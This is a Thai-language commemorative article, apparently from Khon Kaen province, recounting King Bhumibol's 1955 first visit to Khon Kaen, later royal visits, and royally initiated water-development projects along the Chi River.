“ พระมหากรุณาธิคุณ สถิตในดวงใจชาวขอนแก่น ”

“ พระมหากรุณาธิคุณ  สถิตในดวงใจชาวขอนแก่น ”

1

 

     “…นับตั้งแต่ปฐมอดีตกาลแรกตั้งเมืองขอนแก่นแต่ปีเถาะ จุลศักราช ๑๑๔๕ เป็นปีที่ ๒ ในรัชกาลที่ ๑ ตลอดมาจนบัดนี้ ประชาชนชาวขอนแก่นได้รับความร่มเย็น เป็นสุขด้วยเดชะพระบารมีพระมหากษัตริย์ ปกเกล้าฯ เป็นลำดับมาได้ ๑๗๒ ปี ยังมิได้เคยมีพระมหากษัตริย์พระองค์ใดเสด็จฯ มาโปรดเกล้าฯให้ข้าพระพุทธเจ้าทั้งหลายได้เฝ้าทูลละอองธุลีพระบาท…”

 

อีกตอนหนึ่งกราบบังคมทูลว่า

              “ เมื่อคืนวันที่  ๒๘  กุมภาพันธ์ ศกนี้  จังหวัดขอนแก่นได้ประสบอัคคีภัยเพลิงไหม้ตลาดกลางเมือง อันเป็นภยันตรายขนาดหนัก  พ่อค้าคหบดี  และประชาชนได้รับทุกข์ไร้ที่อยู่อาศัยและการยังชีพจำนวนมาก ได้ทรงพระมหากรุณาโปรดเกล้าพระราชทานทรัพย์มาช่วยบรรเทาทุกข์ประชาชนจำนวน ๑๐๐,๐๐๐ บาท       ซึ่งทางราชการจังหวัดขอนแก่นได้น้อมเกล้าถวายรับพระราชทานมาดำเนินการจัดสร้างอาคารสงเคราะห์ถาวร  ให้ผู้ประสบภัยไร้ที่อยู่ได้อาศัยดำรงชีพ ด้วยความสุขตามสมควร ย่อมเป็นปัจจัย ให้ชาวจังหวัดขอนแก่นซาบซี้งในพระมหากรุณาธิคุณ และตระหนักมั่นคงในความจงรักภักดี กตัญญูกตเวทียิ่งขี้นเป็นมหันต์ ในด้านการทำนาปีนี้ฝนก็บริบูรณ์ ยิ่งกว่านี้การคมนาคม และเศรษฐกิจก็ได้รับการทะนุบำรุงให้ดีขี้น ขอถวายพระพรชัยมงคลและอาราธนาคุณพระศรีรัตนตรัยให้ประสิทธิสรรพศิริสวัสดิ์พิพัฒนมงคลพระชนม์สุข สถาพร ขอให้ทรงมีชัยชนะศัตรูหมู่พาลทั่วทิศานุทิศ รุ่งเรืองพระเกียรติคุณวิบูลย์ฤทธิ์ร่มเกล้าของชาวไทยอยู่เย็นเป็น สุขชั่วนิรันดร ”

 (  คำกราบบังคมทูล ตอนหนึ่ง ของผู้ว่าราชการจังหวัดขอนแก่น (หลวงธุระนัยพินิจ)   เมื่อวัน ๕  พฤศจิกายน พุทธศักราช  ๒๔๙๘   ณ  ศาลากลางจังหวัดขอนแก่น )

                                                                                                                                  

 

                 จารึกประวัติศาสตร์พระราชดำเนินไปทรงเยี่ยมราษฎรเพื่อทรงสดับตรับรับฟังทุกข์สุขของพสกนิกรในภาคตะวันออกเฉียงเหนือ  หลังจากที่พระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช เสด็จขึ้นเถลิงถวัลยราชสมบัติแล้ว ทรงมีพระราชประสงค์ที่จะเสด็จพระราชดำเนินไปทรงเยี่ยมราษฎรในทุกภูมิภาคทั่วประเทศ เพื่อพระองค์จักได้ทอดพระเนตรภูมิประเทศ และเป็นการรู้ถึงทุกข์สุขของแผ่นดินว่าผู้คนทั้งหลายมีความเป็นอยู่เฉกเช่นไร               เมื่อเสร็จสิ้นภารกิจจากการศึกษาต่อ ณ ประเทศสวิสเซอร์แลนด์และได้เสด็จนิวัติมาประทับใน พระราชอาณาจักรเป็นการถาวรแล้ว จึงกำหนดการ “เสด็จฯ เยี่ยมราษฎร” ในทุกภูมิภาคทั่วราชอาณาจักรขึ้น      โดยปฐมแห่งการเสด็จฯ ได้ออกไปทรงเยี่ยมราษฎรในภาคตะวันออกเฉียงเหนือเป็นภูมิภาคแรก ระหว่างวันที่  ๒     ถึง  ๒๐  พฤศจิกายน  พุทธศักราช  ๒๔๙๘

 

               โดยในการเสด็จประพาสภาคตะวันออกเฉียงเหนือครั้งนั้นนับเป็นพระมหากรุณาธิคุณที่ได้ทรงเสด็จเยี่ยม พสกนิกรชาวจังหวัดขอนแก่นในวันที่ ๕ – ๖ พฤศจิกายน พ.ศ. ๒๔๙๘  ด้วยซึ่งถือเป็นครั้งแรกที่ประชาชนชาวขอนแก่นได้มีโอกาสชื่นชมพระบารมีอย่างใกล้ชิดและทั่วถึง และในโอกาสต่อมา ก็ได้เสด็จพระราชดำเนินไปประกอบพระราชกรณียกิจในพื้นที่จังหวัดขอนแก่นอีกหลายคราวยังความปลื้มปิติและนับเป็นพระมหากรุณาธิคุณที่พระองค์ท่านทรงมีต่อพสกนิกรชาวขอนแก่นเป็นอย่างยิ่ง

            จังหวัดขอนแก่น  จึงขอนำเรื่องราวการเสด็จฯ ทรงเยี่ยมราษฎรจังหวัดขอนแก่นครั้งแรกและในโอกาสต่าง ๆ ที่มีผู้เขียนหรือบันทึกไว้เป็นหนังสือ บทความ  เผยแพร่ให้ประชาชนได้อ่าน ทั้งทางเว็บไซต์  หนังสือ  วารสาร       และอื่น ๆ อาทิ  ภาพยนตร์ส่วนพระองค์ เรื่อง “ เสด็จฯ เยี่ยมราษฎรขอนแก่น ”  หนังสือ  เสด็จเยี่ยมราษฎร ”  บทความในวารสารกรมการประชาสัมพันธ์  กลุ่มจดหมายเหตุ มข. และอีกหลายแห่ง  มารวบรวมเรียบเรียงเพื่อให้เป็นประวัติศาสตร์จารึกไว้ในใจชาวขอนแก่นและเยาวชนรุ่นลูก รุ่นหลานสืบไป  และต้องขอขอบคุณผู้มีส่วนเกี่ยวข้องทุก ๆ ท่านทั้งที่ได้เอ่ยนามและไม่ได้เอ่ยนาม ไว้ ณ  โอกาสนี้                                                                   

 

 

เสด็จฯเยี่ยมราษฎรขอนแก่น….ครั้งแรก วันเสาร์ที่  ๕  พฤศจิกายน  พุทธศักราช  ๒๔๙๘

                   3 เวลา ๑๒.๐๐ น.  เสด็จขี้นประทับรถไฟพระที่นั่งเคลื่อนที่ออกจากสถานีบัวใหญ่ ต่อไปยังสถานีเมืองพล  จังหวัดขอนแก่น  ข้าราชการ  ประชาชนส่งเสด็จเป็นจำนวนมาก  พล.ต.แส น้อยเศรษฐ  ผู้ว่าราชการภาค ๓  ตามเสด็จกับขบวนรถไฟ  พ.อ.จรูญ  เสรีเริงฤทธิ์  ผู้ว่าการรถไฟและเจ้าหน้าที่ชั้นผู้ใหญ่ของการรถไฟ เช่น นายจำลอง ชนชิลราน ติดตามถวายความสะดวกในการเสด็จฯ ทางรถไฟโดยตลอด  

เวลา ๑๒.๔๔ น. ขบวนรถไฟพระที่นั่งถีงสถานีรถไฟเมืองพล   พระยารามราชภักดี ปลัดกระทรวงมหาดไทย  กราบถวายบังคมทูลเบิกนายพันตำรวจเอก ขุนศุภกิจ  วิเลขการ ผู้ว่าราชการภาค ๔  นายพันตำรวจเอกบุณณะ  ตาละลักษณ์ ผู้บังคับการตำรวจ ภูธร ภาค ๔  เข้าเฝ้าทูลละอองธุลีพระบาท มี ร.ต.อ.แถว พรหมประกาย ณ นครพนม นายอำเภอเมืองพล  ผู้บังคับกองตำรวจ  นายดำรง ธุระเสนา นายกเทศบาลเมืองพล ข้าราชการและประชาชน เฝ้าชมพระบารมีกันอย่างเนืองแน่น   พระสงฆ์ถวายสวดชัยมงคลคาถา เสียงไชโย ถวายพระพร   ดังกึกก้องไปทั่ว

 

 

เวลา ๑๓.๒๕ น.  เสด็จฯ  ถึงสถานีบ้านไผ่ ร.ต.อ.เอิบ อินกนก  นายอำเภอบ้านไผ่ ข้าราชการ และประชาชนรับเสด็จ  นายละมัย ปิ่นสุวรรณ สมุห์บัญชี ธนาคารแห่งกรุงศรีอยุธยา  สาขาบ้านไผ่  ทูลเกล้าฯ ถวายของพระบาทสมเด็จพระเจ้าอยู่หัว และสมเด็จพระนางเจ้าฯ พระบรมราชินีนาถ ทรงโบกพระหัตถ์ ให้บรรดาผู้รับเสด็จเพื่อชมพระบารมีและทรงให้ราษฎรเฝ้าประมาณ ๕ นาที ( เสวยพระกระยาหารบนรถไฟ )      4                                  

เวลา ๑๔.๓๐ น.ขบวนรถไฟพระที่นั่ง เข้าสู่สถานีขอนแก่นทั้งสองพระองค์เสด็จลงจากรถไฟพระที่นั่ง ท่ามกลางเสียงไชโย  ถวายพระพร เสด็จผ่านกองเกียรติยศและแถวรับเสด็จของพ่อค้าประชาชน        ปลัดกระทรวงมหาดไทย กราบบังคมทูลพระกรุณาเบิก หลวงธุระนัยพินิจ  ผู้ว่าราชการจังหวัดขอนแก่นเฝ้าทูลละอองธุลีพระบาท  

 

                                        

 

 

 

5จากนั้นเสด็จขึ้นประทับรถยนต์พระที่นั่ง ออกจากสถานีรถไฟ  สักการะหลักเมือง  รถพระที่นั่งหยุดหน้าศาลหลักเมือง ทรงจุดธูปเทียนถวายสักการะแล้ว  พระราชทานให้เจ้าหน้าที่นำไปที่ศาลหลักเมืองแล้วเสด็จฯ ไปประทับที่ปะรำหน้าศาลากลางจังหวัด  ผู้ว่าราชการจังหวัด กราบบังคมทูลถวาย รายงาน  มีใจความสำคัญ บางตอน  ดังนี้                                                                                       

 “…นับตั้งแต่ปฐมอดีตกาลแรกตั้งเมืองขอนแก่น  แต่ปีเถาะ จุลศักราช ๑๑๔๕ เป็นปีที่ ๒ ในรัชกาลที่ ๑ ตลอดมาจนบัดนี้ ประชาชนชาวขอนแก่นได้รับความร่มเย็น เป็นสุขด้วยเดชะพระบารมีพระมหากษัตริย์ปกเกล้าฯ เป็นลำดับมาได้ ๑๗๒ ปี ยังมิได้เคยมีพระมหากษัตริย์พระองค์ใดเสด็จฯ มาโปรดเกล้าฯ ให้ข้าพระพุทธเจ้าทั้งหลายได้เฝ้าทูลละอองธุลีพระบาท…”

 

6อีกตอนหนี่งกราบบังคมทูลว่า  “เมื่อคืนวันที่ ๒๘ กุมภาพันธ์ ศกนี้ ( ๒๔๙๘  ) จังหวัดขอนแก่นได้ประสบอัคคีภัยเพลิงไหม้ตลาดกลางเมืองอันเป็นภยันตรายขนาดหนัก  พ่อค้าคหบดี และประชาชนได้รับทุกข์ไร้ที่อยู่อาศัยและการยังชีพจำนวนมากได้ทรงพระมหากรุณาโปรดเกล้าพระราชทานทรัพย์มาช่วยบรรเทาทุกข์ประชาชนเป็นจำนวน ๑๐๐,๐๐๐ บาท ซี่งทางราชการจังหวัดขอนแก่น ได้น้อมเกล้าถวายรับพระราชทานมาดำเนินการจัดสร้างอาคารสงเคราะห์ถาวร ให้ผู้ประสบภัยไร้ที่อยู่ได้อาศัยดำรงชีพด้วยความสุขตามสมควร ย่อมเป็นปัจจัย ให้ชาวจังหวัดขอนแก่นซาบซี้งในพระมหากรุณาธิคุณและตระหนักมั่นคงในความจงรักภักดี กตัญญูกตเวทียิ่งขี้นเป็นมหันต์

                   ในด้านการทำนาปีนี้ฝนก็บริบูรณ์ ยิ่งกว่านี้การคมนาคม และเศรษฐกิจก็ได้รับการทนุบำรุงให้ดีขี้น  ขอถวายพระพรชัยมงคลและอาราธนาคุณพระศรีรัตนตรัยให้ประสิทธิสรรพศิริสวัสดิ์พิพัฒนมงคลพระชนม์สุข สถาพร    ขอให้ทรงมีชัยชนะศัตรูหมู่พาลทั่วทิศานุทิศ รุ่งเรืองพระเกียรติคุณวิบูลย์ฤทธิร่มเกล้าของชาวไทย อยู่เย็นเป็น สุขชั่วนิรันดร”                                                                 

                                                                   

 พระบาทสมเด็จพระเจ้าอยู่หัว มีพระราชดำรัสตอบ  ขอบใจประชาชนและเจ้าหน้าที่ที่เกี่ยวข้องในการรับเสด็จ  และทรงยินดี ที่ทราบว่าการทำอาชีพต่างๆ  ของชาวจังหวัดขอนแก่นในปีนี้ได้ผลดี แล้วทรงพระราชทานพรให้ทุกคนมีความสุข  ความเจริญ    เป็นกำลังของชาติบ้านเมืองสืบไป2

 

 จากนั้นทรงเสด็จฯ เยี่ยมราษฎร ณ สนามหน้าศาลากลาง  เพื่อให้ราษฎรเข้าเฝ้าอย่างใกล้ชิดประชาชนเบียดเสียดเพื่อเข้าเฝ้าชมพระบารมีอย่างใกล้ชิดเป็นจำนวนมาก  ทำให้แถวรับเสด็จรวนเรไป และเก้าอี้ที่กั้นไว้ให้ประชาชนนั่งเฝ้ารับเสด็จได้ล้มลงเพราะแรงดันของประชาชน ผู้ใหญ่ที่นำเสด็จต้องนั่งคุกเข่า  ทุกคน  เพื่อกันประชาชนไม่ให้ประชาชนเข้ามาชิดถึงพระองค์ท่านจนเกินไป  แต่การรับเสด็จก็ดำเนินไปด้วยความเรียบร้อย

 

9เสด็จประทับแรม ณ ศาลากลางจังหวัดขอนแก่น จนเวลา ๑๖.๓๐ น. ( วันเสาร์ที่ ๕  พฤศจิกายน ๒๔๙๘ ) เสด็จขึ้นที่ประทับแรม ณ ศาลากลางจังหวัดขอนแก่น ประชาชนเปล่งคำถวายพระพร สลับกับเสียงไชโย ทั้งสองพระองค์ จึงเสด็จพระราชดำเนินออกมารับหน้ามุข ศาลากลาง  ทรงโบกพระหัตถ์ทรงบันทึกทั้งภาพนิ่ง และภาพยนตร์ไว้ทำให้ราษฎรพากันดีใจที่มีภาพติดอยู่ ในกล้องส่วนพระองค์

 

 

 

 

      

 

 

 

12

11เวลา ๑๗.๐๐ น.เศษ  เสด็จโดยขบวนรถยนต์พระที่นั่งออกไปเยี่ยม  ค่ายกองพันทหารม้าที่ ๖  ในสมเด็จพระศรีพัชรินทราบรมราชินีนาถ  เมื่อขบวนเสด็จฯ  ถึงค่ายทหาร ม.พัน  ๖  พ.ท.พิศ  ยังน้อย ผู้บังคับกองพันทหารม้า ทูลเชิญเสด็จไปประทับ ณ ที่กองบังคับการและนำนายทหารเข้าเฝ้าทูลละอองธุลีพระบาท  เสด็จฯ  เยี่ยมค่ายทหารอยู่เป็นเวลานานพอสมควรจึงเสด็จฯ กลับที่ประทับแรม  ณ ศาลากลางจังหวัด

    วันอาทิตย์ที่ ๖ พฤศจิกายน  ๒๔๙๘  เวลาเช้าตรู่ เสด็จออกจากที่ประทับแรมไปประทับเฮลิคอปเตอร์ที่สนามหน้าโรงเรียนสนามบินเพื่อเสด็จขึ้นยอดภูกระดึง ท่ามกลางประชาชนที่เฝ้าส่งเสด็จอย่างหนาแน่น  เครื่องบินพระที่นั่งออกจากขอนแก่น  มุ่งผ่านภูเวียง  ทรงบันทึกภาพเมืองขอนแก่นและหมู่บ้านภูเวียง            

พระมหากรุณาธิคุณต่อชาวจังหวัดขอนแก่น ไม่ได้เป็นเพียงแค่ครั้งที่พระราชทานทรัพย์มาช่วยบรรเทาทุกข์ประชาชนเมื่อครั้งจังหวัดขอนแก่นได้ประสบอัคคีภัยเพลิงไหม้ตลาดกลางเมือง และเสด็จพระราชดำเนินมาให้ประชาชนชาวจังหวัดขอนแก่นเข้าเฝ้าชื่นชมพระบารมีในวันที่ ๕ – ๖ พฤศจิกายน ๒๔๙๘ เท่านั้น   หากแต่ในโอกาสต่อมาก็ได้เสด็จพระราชดำเนินไปประกอบพระราชกรณียกิจในพื้นที่จังหวัดขอนแก่นอีกหลายคราว 

9

15 161718 21 20 19

 

 

ทรงเป็นองค์ประธานเปิดเขื่อนอุบลรัตน์  วันที่  ๑๔  มีนาคม  พุทธศักราช  ๒๕๐๙            พระบาทสมเด็จพระเจ้าอยู่หัว ภูมิพลอดุลยเดช   เสด็จพระราชดำเนินพร้อมด้วยสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ  ทูลกระหม่อมหญิงอุบลรัตน์ราชกัญญา สิริวัฒนาพรรณวดี  ทรงเป็นองค์ประธานเปิดเขื่อนอุบลรัตน์   อำเภออุบลรัตน์  จังหวัดขอนแก่น และทรงพระราชทานชื่อเขื่อนว่า      “เขื่อนอุบลรัตน์”  

1022 23 24 25 26 27 28 29 30 31 32 33 34 35

 

 

 

10

ในหลวง กับ มหาวิทยาลัยขอนแก่น

วันที่ ๒๐ ธันวาคม พุทธศักราช ๒๕๑๐    ทรงเสด็จพระราชดำเนินประกอบพิธีเปิดมหาวิทยาลัยขอนแก่น เสด็จเยี่ยมชมกิจการของมหาวิทยาลัย       และทรงปลูกต้นกัลปพฤกษ์ไว้เป็นที่ระลึก

                     ในปีต่อมาพระบาทสมเด็จพระเจ้าอยู่หัว ได้เสด็จพระราชดำเนินในการพระราชทานปริญญาบัตรแก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่นรุ่นแรกเมื่อวันที่ ๑๖ ธันวาคม พุทธศักราช ๒๕๑๑  และในโอกาสนี้ มหาวิทยาลัยขอนแก่นได้ทูลเกล้าฯ ถวายปริญญาวิศวกรรมศาสตรดุษฎีบัณฑิตกิตติมศักดิ์แด่พระบาทสมเด็จพระเจ้าอยู่หัวฯ ด้วย

และพระบาทสมเด็จพระเจ้าอยู่หัวฯ ได้เสด็จพระราชทานปริญญาบัตรแก่ผู้สำเร็จการศึกษาจากมหาวิทยาลัยขอนแก่น ด้วยพระองค์เองจวบจนถึงปีพุทธศักราช ๒๕๔๑

 

                     นอกจากการเสด็จฯ พระราชทานปริญญาบัตรแก่ผู้สำเร็จการศึกษาในแต่ละปีแล้วนั้นพระบาทสมเด็จ พระเจ้าอยู่หัว ยังทรงมีพระเมตตาเสด็จประกอบพระราชกรณียกิจอื่นๆ ต่อมหาวิทยาลัยขอนแก่นอีกมากมาย

 

วันศุกร์ที่ ๒o ธันวาคม พุทธศักราช ๒๕๑๗

                     เสด็จฯ  เยี่ยมชมกิจการโรงเรียนสาธิตมหาวิทยาลัยขอนแก่น และทรงปลูกต้นประดู่แดง ณ บริเวณคณะศึกษาศาสตร์

 

 

36 48 46 45 44 43 42 41 40 39 38 37

 

วันที่ ๑๙ กุมภาพันธ์ พุทธศักราช ๒๕๑๙

                   พระบาทสมเด็จพระเจ้าอยู่หัว  ได้เสด็จพระราชดำเนินมาทรงวางศิลาฤกษ์  ณ  อาคารโรงพยาบาล  ศรีนครินทร์ เมื่อวันที่ ๑๙ กุมภาพันธ์ พุทธศักราช ๒๕๑๙ และมีพระบรมราชโองการพระราชทานนามว่า “โรงพยาบาลศรีนครินทร์” ตามพระนามของสมเด็จพระศรีนครินทราบรมราชชนนี การก่อสร้างอาคาร ตรวจรักษาและอาคารบริการของโรงพยาบาลได้แล้วเสร็จในปี พุทธศักราช ๒๕๒๕ จึงได้ย้ายหน่วยงานทั้งหมดมาที่โรงพยาบาลศรีนครินทร์ พระบาทสมเด็จพระเจ้าอยู่หัว  พร้อมด้วยสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ  เสด็จพระราชดำเนินมาทรงเปิดโรงพยาบาลศรีนครินทร์ เมื่อวันที่ ๑๕ ธันวาคม พุทธศักราช ๒๕๒๖

 46 47 48

 

                    หลังจากนั้น  เสด็จพระราชดำเนินพระราชทานธงประจำรุ่นลูกเสือชาวบ้านจังหวัดขอนแก่น ณ มหาวิทยาลัยขอนแก่น   เมื่อวันที่ ๑๙ กุมภาพันธ์ พุทธศักราช ๒๕๑๙  โดยมีพระราชดำรัส ความว่า “…เมืองไทยนี้อยู่ได้ด้วยความสามัคคี   ด้วยความเข้มแข็ง  ด้วยความเสียสละ อาศัยความเห็นอกเห็นใจซึ่งกันและกัน  และถ้ารักษาความเห็นอกเห็นใจนี้แล้ว  ประเทศชาติของเราก็จะเป็นที่อาศัยที่อุดมสมบูรณ์และน่าสบายต่อไปชั่วกาลนาน…”49

 วันที่  ๒๖  พฤศจิกายน  พุทธศักราช  ๒๕๒๓ 

              เสด็จพระราชดำเนินเยี่ยมราษฎร ณ บ้านหัวนาคำ ตำบลห้วยยาง  อำเภอกระนวน  จังหวัดขอนแก่น  ซึ่งเป็นหมู่บ้านตัวอย่างในโครงการสร้างความมั่นคงในชนบทที่หมู่บ้าน ดำเนินการโดยกองบังคับการตำรวจตระเวนชายแดน ทอดพระเนตรสถานสงเคราะห์เด็กก่อนวัยเรียน เยี่ยมกลุ่มเลี้ยงไหมและย้อมสีทอผ้า ทอดพระเนตรผลิตภัณฑ์ผ้าไหมของราษฎร  ทรงปลูกต้นพิกุลและต้นแก้วไว้เป็นที่ระลึก

  50

 51

 51

 

 วันที่  ๑๑  พฤศจิกายน  พุทธศักราช ๒๕๔๔

                   สมเด็จพระนางเจ้าสิริกิติ์  พระบรมราชินีนาถ  เสด็จพระราชดำเนินเยี่ยมราษฎรและสมาชิกศิลปาชีพ ณ ศูนย์ศิลปาชีพบ้านโสกส้มกบ  ตำบลบ้านใหม่  อำเภอสีชมพู  จังหวัดขอนแก่น  ในการนี้ได้พระราชทานความช่วยแก่ราษฎรที่มาเฝ้าทูลละอองธุลีพระบาทเป็นจำนวนมาก

 52 53

 

                   ทุกครั้งที่ พระบาทสมเด็จพระเจ้าอยู่หัวเสด็จพระราชดำเนินไปประทับ ณ จังหวัดขอนแก่น นอกจากจะทรงปฏิบัติพระราชกรณียกิจต่างๆรวมทั้งทรงเยี่ยมราษฎรเพื่อให้ทรงทราบถึงความทุกข์สุขของพสกนิกรแล้วสิ่งหนึ่งที่จะทรงปฏิบัติในการเสด็จพระราชดำเนินทุกหนทุกแห่งโดยมิได้ขาด คือ การพระราชทานแนวพระราชดำริแก่ส่วนราชการและหน่วยงานต่างๆเพื่อเป็นแนวทางใน การแก้ไขปัญหาความเดือดร้อนให้แก่ราษฎรโดยเฉพาะอย่างยิ่งการแก้ไขปัญหาความแห้งแล้ง การขาดแคลนน้ำเพื่อการเกษตร ปัญหาอุทกภัย ตลอดจนการประกอบอาชีพของราษฎร  โครงการภายใต้พระราชดำริทั้งมวลล้วนสร้างคุณประโยชน์แก่ราษฎรในพื้นที่เป็นอย่างยิ่ง

 

 

วันที่ ๑  พฤษภาคม พุทธศักราช ๒๕๒๐  

         54

                     พระบาทสมเด็จพระเจ้าอยู่หัว และสมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ เสด็จพระราชดำเนินพร้อมด้วยสมเด็จพระเจ้าลูกเธอทั้งสองพระองค์ ไปยังบ้านดอนหัน  หมู่ที่ ๑๒ ตำบลชุมแพ  อำเภอชุมแพ  จังหวัดขอนแก่น  เพื่อทอดพระเนตรฝายทดน้ำในลำน้ำเชิญ ของโครงการสหกรณ์ลำน้ำเชิญ ในการนี้ได้มีพระราชปฏิสันถารกับราษฎรและเจ้าหน้าที่ที่มาเฝ้าทูลละอองธุลีพระบาท      ทรงพระกรุณาโปรดเกล้าโปรดกระหม่อมให้แพทย์โดยเสด็จพระราชดำเนินทำการตรวจรักษาผู้เจ็บป่วยโดยทั่วถึง

พระราชดำริการแก้ไขปัญหาน้ำลำน้ำชีในพื้นที่จังหวัดขอนแก่น

                   พระบาทสมเด็จพระเจ้าอยู่หัว ในคราวเสด็จพระราชดำเนินพระราชทานปริญญาบัตรนักศึกษามหาวิทยาลัยขอนแก่น เมื่อวันที่ ๑๙ ธันวาคม  ๒๕๓๙   ทรงมีพระราชดำรัสกับผู้ว่าราชการจังหวัดขอนแก่น และ   แม่ทัพภาคที่ ๒  ว่าลำน้ำชีในฤดูน้ำหลาก น้ำท่วมพื้นที่ทั้งสองฝั่ง ซึ่งมีห้วย หนอง บึง และพื้นที่สาธารณะมาก  เมื่อถึงเวลาน้ำลดน้ำที่ท่วมพื้นที่ดังกล่าวก็ลดตามไปด้วย ทำให้เกิดการขาดแคลนน้ำเช่นเคย จึงควรที่จะมีการสำรวจและหาวิธีการเก็บกักน้ำให้อยู่ในพื้นที่ดังกล่าวตลอดไป เพื่อประโยชน์ในการเพาะปลูก และในคราวเมื่อวันที่ ๑๘ ธันวาคม ๒๕๔๐  ทรงมีพระราชดำรัสกับผู้ว่าราชการจังหวัดขอนแก่น และแม่ทัพภาคที่ ๒  ให้ประสานกรมชลประทานหรือหน่วยงานอื่นให้สำรวจพื้นที่รอบๆ อ่าง เพื่อพิจารณาขุดลอกอ่างเก็บน้ำเสริมคันดินกั้นน้ำให้สูง เพื่อให้เก็บน้ำได้มากในฤดูฝน  เพื่อให้สามารถนำมาใช้ประโยชน์ในการทำนาปรังได้  รวมทั้งช่วยป้องกันน้ำท่วมตัวเมืองขอนแก่นในฤดูที่มีฝนตกหนัก และนอกจากนั้นจะช่วยให้สามารถนำมาใช้ในโครงการเกษตรน้ำฝนตามทฤษฎีใหม่ได้ด้วย

                                                                             

การดำเนินตามรอยพระราชดำริ

                   จังหวัดขอนแก่นได้รับสนองกระแสพระราชดำริ ไปทำการศึกษารายละเอียดของสภาพพื้นที่เพื่อประกอบการวางแผนพัฒนาสองฝั่งลำน้ำชีภายหลังจากการสำรวจและศึกษาสภาพพื้นที่แล้ว จังหวัดขอนแก่นได้จัดทำ  “โครงการพัฒนาแหล่งน้ำสองฝั่งลำน้ำชีอันเนื่องมาจากพระราชดำริ จังหวัดขอนแก่น”  ขึ้น เพื่อสนองพระราชดำริ โดยโครงการมีวัตถุประสงค์หลักในการดำเนินงาน คือ ขุดลอกอ่างเก็บน้ำเดิม หรือแหล่งน้ำธรรมชาติเดิมที่มีอยู่ เสริมคันกั้นน้ำเพื่อเพิ่มพื้นที่กักเก็บน้ำในฤดูฝน และนำน้ำไปใช้ประโยชน์ในการทำนาปรัง  เป็นแหล่งน้ำต้นทุนในการนำน้ำไปใช้ในโครงการเกษตรน้ำฝนตามทฤษฎีใหม่ เป็นแก้มลิงป้องกันน้ำท่วมตัวเมืองขอนแก่นในฤดูน้ำหลาก  เป็นแหล่งเพาะพันธุ์สัตว์น้ำ และการประมงธรรมชาติ  รวมทั้งเป็นแหล่งกักเก็บน้ำสำหรับการอุปโภคบริโภคในฤดูแล้ง  ตลอดจนการเลี้ยงสัตว์ด้วย

                   สำหรับลำน้ำชีนั้นถือเป็นแม่น้ำขนาดใหญ่  มีต้นกำเนิดจากเทือกเขาสันปันน้ำของลุ่มน้ำป่าสักกับลุ่มน้ำชีในเขตพื้นที่จังหวัดชัยภูมิ  มีน้ำไหลตลอดปี  สองฝั่งลำน้ำชีจะแบนราบ  ท้องน้ำมีความลาดชันน้อย ในฤดูฝนน้ำจะบ่าล้นตลิ่งสองฝั่ง  การขึ้นลงของน้ำมีลักษณะขึ้นเร็วลงช้า  กล่าวคือเมื่อมีฝนตกหนักจะมีน้ำไหลมากและล้นฝั่ง  เมื่อฝนตกน้อยน้ำในแม่น้ำจะไหลน้อยลง  แม่น้ำชีไหลเข้าสู่จังหวัดขอนแก่น  ที่อำเภอแวงน้อย  ผ่านอำเภอแวงใหญ่  อำเภอชนบท  อำเภอมัญจาคีรี   อำเภอบ้านไผ่  และอำเภอเมืองขอนแก่น  และไหลผ่านอำเภอโกสุมพิสัย  พื้นที่ของจังหวัดมหาสารคาม  จังหวัดร้อยเอ็ด  จังหวัดยโสธร  และไปบรรจบกับแม่น้ำมูลที่จังหวัดอุบลราชธานี   รวมระยะทางประมาณ  ๙๐๐  กิโลเมตร

                    การเริ่มโครงการพัฒนาแหล่งน้ำสองฝั่งลำน้ำชีอันเนื่องมาจากพระราชดำริ จังหวัดขอนแก่น  ภายหลังจากได้รับกระแสพระราชดำริ  ตั้งแต่ปี  พ.ศ. ๒๕๔๐ เป็นต้นมา  จังหวัดขอนแก่นได้ทำการพัฒนาแหล่งน้ำในกิจกรรมต่างๆ ประกอบด้วย  การขุดลอกแหล่งน้ำเพื่อเก็บกักน้ำและแก้มลิง และการจัดสร้างฝายเก็บน้ำ โดยดำเนินการไปแล้ว จำนวน  ๒๙  แห่ง  ครอบคลุมพื้นที่ ๘ อำเภอที่ได้รับผลกระทบและเชื่อมโยงกับลำน้ำชี    แหล่งน้ำที่ได้รับการพัฒนาดังกล่าวขณะนี้  รวมความจุของน้ำได้ทั้งสิ้นกว่า  ๔๗  ล้านลูกบาศก์เมตร   มีพื้นที่การเกษตรของราษฎรได้รับประโยชน์ถึง ๓๗,๔๓๗ ไร่   ครอบคลุมในพื้นที่  ๑๗   ตำบลของอำเภอที่เชื่อมโยงกับลำน้ำชี  โดยแต่ละโครงการจะมีรายละเอียดในการดำเนินงานและการใช้ประโยชน์ที่หลากหลาย  ซึ่งในที่นี้ขอยกตัวอย่างโครงการที่อยู่ในกลุ่มโครงการพัฒนาแหล่งน้ำสองฝั่งลำน้ำชี ที่แสดงให้เห็นถึงประโยชน์ที่ประชาชนในพื้นที่ได้รับจากโครงการอันเนื่องมาจากพระราชดำริสำคัญ  ใน  ๓  โครงการ  ได้แก่

โครงการพัฒนาบึงแก่งน้ำต้อน   –  บึงแก่งน้ำต้อน ตั้งอยู่ที่หมู่ที่ ๓  บ้านกุดกว้าง            

ตำบลเมืองเก่า อำเภอเมืองขอนแก่น  จังหวัดขอนแก่น  แก่งน้ำต้อนเป็นแหล่งน้ำสาธารณะมีพื้นที่ประมาณ  ๓,๕๐๐  ไร่   ความจุประมาณ ๕ ล้านลูกบาศก์เมตร  หากพัฒนาแก่งน้ำต้อนอย่างเต็มศักยภาพของพื้นที่ทั้งหมดแล้วจะทำให้กักเก็บน้ำเพิ่มได้อีก ๗.๘ ล้านลูกบาศก์เมตร   รวมความจุที่จะสามารถเก็บน้ำไว้ในแก่งน้ำต้อนได้ไม่น้อยกว่า๑๒ ล้านลูกบาศก์เมตร

